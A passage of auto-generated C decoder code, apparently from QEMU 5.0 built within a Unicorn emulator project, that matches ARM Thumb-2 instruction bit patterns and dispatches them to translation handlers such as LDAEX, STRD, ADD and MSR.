0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 11001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:534 */ if (trans_LDAEXB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xd: /* 11101000 1101.... ........ 1101.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 11011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:535 */ if (trans_LDAEXH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xe: /* 11101000 1101.... ........ 1110.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 11101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:533 */ if (trans_LDAEX(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xf: /* 11101000 1101.... ........ 1111.... */ disas_t32_extract_ldrex_d(ctx, &u.f_ldrex, insn); switch (insn & 0x0000000f) { case 0x0000000f: /* 11101000 1101.... ........ 11111111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:536 */ if (trans_LDAEXD_t32(ctx, &u.f_ldrex)) return true; return false; } return false; } return false; } return false; case 0x2: /* 11101000 .110.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:483 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 0; if (trans_STRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x3: /* 11101000 .111.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:484 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 0; if (trans_LDRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; } return false; case 0x01000000: /* 11101001 .0...... ........ ........ */ switch (insn & 0x00900000) { case 0x00000000: /* 11101001 00.0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:608 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 0; u.f_ldst_block.b = 1; if (trans_STM_t32(ctx, &u.f_ldst_block)) return true; return false; case 0x00100000: /* 11101001 00.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:610 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 0; u.f_ldst_block.b = 1; if (trans_LDM_t32(ctx, &u.f_ldst_block)) return true; return false; case 0x00800000: /* 11101001 10.0.... ........ ........ */ disas_t32_extract_srs(ctx, &u.f_srs, insn); switch ((insn >> 5) & 0x7fff) { case 0x6e00: /* 11101001 10.01101 11000000 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:622 */ u.f_srs.pu = 1; if (trans_SRS(ctx, &u.f_srs)) return true; return false; } return false; case 0x00900000: /* 11101001 10.1.... ........ ........ */ disas_t32_extract_rfe(ctx, &u.f_rfe, insn); switch (insn & 0x0000ffff) { case 0x0000c000: /* 11101001 10.1.... 11000000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:616 */ u.f_rfe.pu = 1; if (trans_RFE(ctx, &u.f_rfe)) return true; return false; } return false; } return false; case 0x01400000: /* 11101001 .1...... ........ ........ */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11101001 .100.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:486 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 0; u.f_ldst_ri2.p = 1; if (trans_STRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x1: /* 11101001 .101.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:487 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 0; u.f_ldst_ri2.p = 1; if (trans_LDRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x2: /* 11101001 .110.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:489 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 1; if (trans_STRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x3: /* 11101001 .111.... ........ ........ */ if ((insn & 0x008fffff) == 0x000fe97f) { /* 11101001 01111111 11101001 01111111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:491 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_SG(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:492 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 1; if (trans_LDRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; } return false; case 0x02000000: /* 11101010 .0...... ........ ........ */ switch (insn & 0x00a08000) { case 0x00000000: /* 11101010 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101010 0001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:61 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_TST_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:62 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_AND_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00200000: /* 11101010 001..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:64 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_BIC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00800000: /* 11101010 100..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101010 1001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:74 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_TEQ_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:75 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_EOR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x02400000: /* 11101010 .1...... ........ ........ */ switch (insn & 0x00a08000) { case 0x00000000: /* 11101010 010..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11101010 010.1111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:66 */ disas_t32_extract_s_rxr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:67 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_ORR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00200000: /* 11101010 011..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11101010 011.1111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:70 */ disas_t32_extract_s_rxr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_MVN_rxri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:71 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_ORN_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00800000: /* 11101010 110..... 0....... ........ */ disas_t32_extract_disas_t32_Fmt_3(ctx, &u.f_pkh, insn); switch (insn & 0x00100010) { case 0x00000000: /* 11101010 1100.... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:77 */ if (trans_PKH(ctx, &u.f_pkh)) return true; return false; } return false; } return false; case 0x03000000: /* 11101011 .0...... ........ ........ */ switch (insn & 0x00a08000) { case 0x00000000: /* 11101011 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101011 0001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:80 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_CMN_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:81 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00a00000: /* 11101011 101..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101011 1011.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:86 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:87 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_SUB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x03400000: /* 11101011 .1...... ........ ........ */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x00a08000) { case 0x00000000: /* 11101011 010..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:83 */ if (trans_ADC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00200000: /* 11101011 011..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:84 */ if (trans_SBC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00800000: /* 11101011 110..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:89 */ if (trans_RSB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x1e: /* 11110... ........ ........ ........ */ switch ((insn >> 15) & 0x1) { case 0x0: /* 11110... ........ 0....... ........ */ switch ((insn >> 22) & 0xf) { case 0x0: /* 11110.00 00...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.00 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.00 0001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:109 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_TST_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:110 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_AND_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 11110.00 001..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:112 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_BIC_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x1: /* 11110.00 01...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.00 010..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.00 010.1111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:114 */ disas_t32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); if (trans_MOV_rxi(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:115 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ORR_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 11110.00 011..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.00 011.1111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:118 */ disas_t32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); if (trans_MVN_rxi(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:119 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ORN_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x2: /* 11110.00 10...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.00 100..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.00 1001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:122 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_TEQ_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:123 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_EOR_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x4: /* 11110.01 00...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.01 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.01 0001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:126 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_CMN_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:127 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x5: /* 11110.01 01...... 0....... ........ */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.01 010..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:129 */ if (trans_ADC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 11110.01 011..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:130 */ if (trans_SBC_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x6: /* 11110.01 10...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x1: /* 11110.01 101..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.01 1011.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:132 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_CMP_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:133 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x7: /* 11110.01 11...... 0....... ........ */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.01 110..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:135 */ if (trans_RSB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x8: /* 11110.10 00...... 0....... ........ */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11110.10 0000.... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.10 00001111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:145 */ disas_t32_extract_disas_t32_Fmt_9(ctx, &u.f_ri, insn); if (trans_ADR(ctx, &u.f_ri)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:147 */ disas_t32_extract_s0_rri_12(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x9: /* 11110.10 01...... 0....... ........ */ disas_t32_extract_mov16(ctx, &u.f_ri, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11110.10 0100.... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:161 */ if (trans_MOVW(ctx, &u.f_ri)) return true; return false; } return false; case 0xa: /* 11110.10 10...... 0....... ........ */ switch ((insn >> 20) & 0x3) { case 0x2: /* 11110.10 1010.... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.10 10101111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:150 */ disas_t32_extract_disas_t32_Fmt_10(ctx, &u.f_ri, insn); if (trans_ADR(ctx, &u.f_ri)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:152 */ disas_t32_extract_s0_rri_12(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xb: /* 11110.10 11...... 0....... ........ */ disas_t32_extract_mov16(ctx, &u.f_ri, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11110.10 1100.... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:162 */ if (trans_MOVT(ctx, &u.f_ri)) return true; return false; } return false; case 0xc: /* 11110.11 00...... 0....... ........ */ switch (insn & 0x04100020) { case 0x00000000: /* 11110011 00.0.... 0....... ..0..... */ if ((insn & 0x002070c0) == 0x00200000) { /* 11110011 0010.... 0000.... 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:172 */ disas_t32_extract_sat16(ctx, &u.f_sat, insn); if (trans_SSAT16(ctx, &u.f_sat)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:173 */ disas_t32_extract_sat(ctx, &u.f_sat, insn); if (trans_SSAT(ctx, &u.f_sat)) return true; return false; } return false; case 0xd: /* 11110.11 01...... 0....... ........ */ switch (insn & 0x04300020) { case 0x00000000: /* 11110011 0100.... 0....... ..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:185 */ disas_t32_extract_bfx(ctx, &u.f_bfx, insn); if (trans_SBFX(ctx, &u.f_bfx)) return true; return false; case 0x00200000: /* 11110011 0110.... 0....... ..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:189 */ disas_t32_extract_bfi(ctx, &u.f_bfi, insn); if (trans_BFCI(ctx, &u.f_bfi)) return true; return false; } return false; case 0xe: /* 11110.11 10...... 0....... ........ */ switch (insn & 0x04100020) { case 0x00000000: /* 11110011 10.0.... 0....... ..0..... */ if ((insn & 0x002070c0) == 0x00200000) { /* 11110011 1010.... 0000.... 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:176 */ disas_t32_extract_sat16(ctx, &u.f_sat, insn); if (trans_USAT16(ctx, &u.f_sat)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:177 */ disas_t32_extract_sat(ctx, &u.f_sat, insn); if (trans_USAT(ctx, &u.f_sat)) return true; return false; } return false; case 0xf: /* 11110.11 11...... 0....... ........ */ disas_t32_extract_bfx(ctx, &u.f_bfx, insn); switch (insn & 0x04300020) { case 0x00000000: /* 11110011 1100.... 0....... ..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:186 */ if (trans_UBFX(ctx, &u.f_bfx)) return true; return false; } return false; } return false; case 0x1: /* 11110... ........ 1....... ........ */ switch (insn & 0x00005000) { case 0x00000000: /* 11110... ........ 10.0.... ........ */ if ((insn & 0x03800000) == 0x03800000) { /* 11110.11 1....... 10.0.... ........ */ if ((insn & 0x047f2f00) == 0x002f0000) { /* 11110011 10101111 10000000 ........ */ if ((insn & 0x000000ff) == 0x00000001) { /* 11110011 10101111 10000000 00000001 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:297 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_YIELD(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000002) { /* 11110011 10101111 10000000 00000010 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:298 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_WFE(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000003) { /* 11110011 10101111 10000000 00000011 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:299 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_WFI(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:307 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } if ((insn & 0x047f2800) == 0x002f0000) { /* 11110011 10101111 10000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:311 */ disas_t32_extract_disas_t32_Fmt_23(ctx, &u.f_cps, insn); if (trans_CPS(ctx, &u.f_cps)) return true; } if ((insn & 0x047f2f80) == 0x003f0f00) { /* 11110011 10111111 10001111 0....... */ if ((insn & 0x0000007f) == 0x0000002f) { /* 11110011 10111111 10001111 00101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:316 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_CLREX(ctx, &u.f_empty)) return true; } if ((insn & 0x00000070) == 0x00000040) { /* 11110011 10111111 10001111 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:317 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_DSB(ctx, &u.f_empty)) return true; } if ((insn & 0x00000070) == 0x00000050) { /* 11110011 10111111 10001111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:318 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_DMB(ctx, &u.f_empty)) return true; } if ((insn & 0x00000070) == 0x00000060) { /* 11110011 10111111 10001111 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:319 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_ISB(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007f) == 0x00000070) { /* 11110011 10111111 10001111 01110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:320 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_SB(ctx, &u.f_empty)) return true; } } if ((insn & 0x04602000) == 0x00600000) { /* 11110011 111..... 1000.... ........ */ if ((insn & 0x000000ef) == 0x00000020) { /* 11110011 111..... 1000.... 001.0000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:325 */ disas_t32_extract_disas_t32_Fmt_24(ctx, &u.f_mrs_bank, insn); if (trans_MRS_bank(ctx, &u.f_mrs_bank)) return true; } if ((insn & 0x000f00ff) == 0x000f0000) { /* 11110011 111.1111 1000.... 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:327 */ disas_t32_extract_disas_t32_Fmt_25(ctx, &u.f_mrs_reg, insn); if (trans_MRS_reg(ctx, &u.f_mrs_reg)) return true; } if ((insn & 0x001f0000) == 0x000f0000) { /* 11110011 11101111 1000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:328 */ disas_t32_extract_disas_t32_Fmt_26(ctx, &u.f_disas_t3227, insn); if (trans_MRS_v7m(ctx, &u.f_disas_t3227)) return true; } } if ((insn & 0x04602000) == 0x00000000) { /* 11110011 100..... 1000.... ........ */ if ((insn & 0x000000ef) == 0x00000020) { /* 11110011 100..... 1000.... 001.0000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:331 */ disas_t32_extract_disas_t32_Fmt_27(ctx, &u.f_msr_bank, insn); if (trans_MSR_bank(ctx, &u.f_msr_bank)) return true; } if ((insn & 0x000000ff) == 0x00000000) { /* 11110011 100..... 1000.... 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:333 */ disas_t32_extract_disas_t32_Fmt_28(ctx, &u.f_msr_reg, insn); if (trans_MSR_reg(ctx, &u.f_msr_reg)) return true; } if ((insn & 0x00100300) == 0x00000000) { /* 11110011 1000.... 1000..00 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:334 */ disas_t32_extract_disas_t32_Fmt_29(ctx, &u.f_disas_t3228, insn); if (trans_MSR_v7m(ctx, &u.f_disas_t3228)) return true; } } if ((insn & 0x04702fff) == 0x00400f00) { /* 11110011 1100.... 10001111 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:336 */ disas_t32_extract_disas_t32_Fmt_30(ctx, &u.f_r, insn); if (trans_BXJ(ctx, &u.f_r)) return true; } if ((insn & 0x047f2f00) == 0x005e0f00) { /* 11110011 11011110 10001111 ........ */ if ((insn & 0x000000ff) == 0x00000000) { /* 11110011 11011110 10001111 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:341 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_ERET(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:342 */ disas_t32_extract_disas_t32_Fmt_31(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; } if ((insn & 0x04702fff) == 0x04700000) { /* 11110111 1111.... 10000000 00000000 */ /* 